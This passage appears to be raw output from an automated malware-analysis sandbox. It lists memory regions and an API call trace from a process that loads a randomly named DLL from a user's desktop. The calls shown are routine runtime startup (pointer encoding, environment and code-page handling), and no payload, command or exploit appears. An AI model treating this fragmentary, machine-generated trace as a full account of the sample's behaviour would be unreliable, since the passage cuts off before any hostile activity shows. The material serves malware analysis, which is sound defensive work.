"\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 275 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 276 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 277 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 278 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 279 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 280 start_va = 0x380000 end_va = 0x447fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 281 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 282 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 320 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 321 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 322 start_va = 0x540000 end_va = 0x640fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 323 start_va = 0x1200000 end_va = 0x1dfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" Region: id = 324 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 325 start_va = 0x72dd0000 end_va = 0x72e14fff entry_point = 0x72dd0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 326 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 327 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 328 start_va = 0x1d0000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 329 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 330 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 331 start_va = 0x450000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 332 start_va = 0x74130000 end_va = 0x7414bfff entry_point = 0x74130000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 362 start_va = 0x74120000 end_va = 0x74126fff entry_point = 0x74120000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 371 start_va = 0x73fc0000 end_va = 0x73fd1fff entry_point = 0x73fc0000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 389 start_va = 0x7f0000 end_va = 0x8effff entry_point = 0x0 region_type = private name = "private_0x00000000007f0000" filename = "" Region: id = 390 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Thread: id = 8 os_tid = 0xa64 [0030.582] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cf92c | out: lpSystemTimeAsFileTime=0x1cf92c*(dwLowDateTime=0xe0102570, dwHighDateTime=0x1d3dfba)) [0030.582] GetCurrentProcessId () returned 0xa60 [0030.582] GetCurrentThreadId () returned 0xa64 [0030.582] GetTickCount () returned 0x16dbf [0030.582] QueryPerformanceCounter (in: lpPerformanceCount=0x1cf924 | out: lpPerformanceCount=0x1cf924*=357292399) returned 1 [0030.583] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0030.583] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0030.583] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0030.584] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0030.584] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0030.584] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0030.584] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0030.584] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0030.584] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0030.584] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0030.584] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0030.584] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0030.584] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0030.585] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0030.585] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0030.585] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0030.585] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0030.585] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0030.585] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0030.585] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0030.585] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0030.586] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0030.586] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0030.586] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0030.586] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0030.586] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0030.586] GetCurrentThreadId () returned 0xa64 [0030.586] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=AddAtomT" [0030.586] GetEnvironmentStringsW () returned 0x297878* [0030.586] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0030.587] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x2009f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0030.587] FreeEnvironmentStringsW (penv=0x297878) returned 1 [0030.587] GetStartupInfoA (in: lpStartupInfo=0x1cf87c | out: lpStartupInfo=0x1cf87c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0030.587] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0030.587] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0030.587] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0030.587] SetHandleCount (uNumber=0x20) returned 0x20 [0030.587] GetLastError () returned 0x0 [0030.587] SetLastError (dwErrCode=0x0) [0030.587] GetLastError () returned 0x0 [0030.587] SetLastError (dwErrCode=0x0) [0030.587] GetLastError () returned 0x0 [0030.587] SetLastError (dwErrCode=0x0) [0030.587] GetACP () returned 0x4e4 [0030.587] GetLastError () returned 0x0 [0030.587] SetLastError (dwErrCode=0x0) [0030.587] IsValidCodePage (CodePage=0x4e4) returned 1 [0030.587] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x1cf85c | out: lpCPInfo=0x1cf85c) returned 1 [0030.587] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x1cf328 | out: lpCPInfo=0x1cf328) returned 1 [0030.588] GetLastError () returned 0x0 [0030.588] SetLastError (dwErrCode=0x0) [0030.588] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x1cf2b8 | out: lpCharType=0x1cf2b8) returned 1 [0030.588] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1cf73c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0030.588] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1cf73c, cbMultiByte=256, lpWideCharStr=0x1cf0a8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왈狟Ā") returned 256 [0030.588] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왈狟Ā", cchSrc=256, lpCharType=0x1cf33c | out: lpCharType=0x1cf33c) returned 1 [0030.588] GetLastError () returned 0x0 [0030.588] SetLastError (dwErrCode=0x0) [0030.588] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0030.588] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1cf73c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0030.588] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1cf73c, cbMultiByte=256, lpWideCharStr=0x1cf078, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0030.588] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0030.588] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x1cee68, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0030.588] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x1cf63c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÞÍ\x80õtø\x1c", lpUsedDefaultChar=0x0) returned 256 [0030.588] GetLastError () returned 0x0 [0030.588] SetLastError (dwErrCode=0x0) [0030.588] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1cf73c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0030.588] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1cf73c, cbMultiByte=256, lpWideCharStr=0x1cf098, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0030.588] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0030.588] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x1cee88, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0030.588] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x1cf53c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÞÍ\x80õtø\x1c", lpUsedDefaultChar=0x0) returned 256 [0030.588] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72e0d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0030.589] GetLastError () returned 0x0 [0030.589] SetLastError (dwErrCode=0x0) [0030.589] GetLastError () returned 0x0 [0030.589] SetLastError (dwErrCode=0x0) [0030.589] GetLastError () returned 0x0 [0030.589] SetLastError (dwErrCode=0x0) [0030.589] GetLastError () returned 0x0 [0030.589] SetLastError (dwErrCode=0x0) [0030.589] GetLastError () returned 0x0 [0030.589] SetLastError (dwErrCode=0x0) [0030.589] GetLastError () returned 0x0 [0030.589] SetLastError (dwErrCode=0x0) [0030.589] GetLastError () returned 0x0 [0030.589] SetLastError (dwErrCode=0x0) [0030.589] GetLastError () returned 0x0 [0030.589] SetLastError (dwErrCode=0x0) [0030.589] GetLastError () returned 0x0 [0030.589] SetLastError (dwErrCode=0x0) [0030.589] GetLastError () returned 0x0 [0030.589] SetLastError (dwErrCode=0x0) [0030.589] GetLastError () returned 0x0 [0030.589] SetLastError (dwErrCode=0x0) [0030.589] GetLastError () returned 0x0 [0030.590] SetLastError (dwErrCode=0x0) [0030.590] GetLastError () returned 0x0 [0030.590] SetLastError (dwErrCode=0x0) [0030.590] GetLastError () returned 0x0 [0030.590] SetLastError (dwErrCode=0x0) [0030.590] GetLastError () returned 0x0 [0030.590] SetLastError (dwErrCode=0x0) [0030.590] GetLastError () returned 0x0 [0030.590] SetLastError (dwErrCode=0x0) [0030.590] GetLastError () returned 0x0 [0030.590] SetLastError (dwErrCode=0x0) [0030.590] GetLastError () returned 0x0 [0030.590] SetLastError (dwErrCode=0x0) [0030.590] GetLastError () returned 0x0 [0030.590] SetLastError (dwErrCode=0x0) [0030.590] GetLastError () returned 0x0 [0030.590] SetLastError (dwErrCode=0x0) [0030.590] GetLastError () returned 0x0 [0030.590] SetLastError 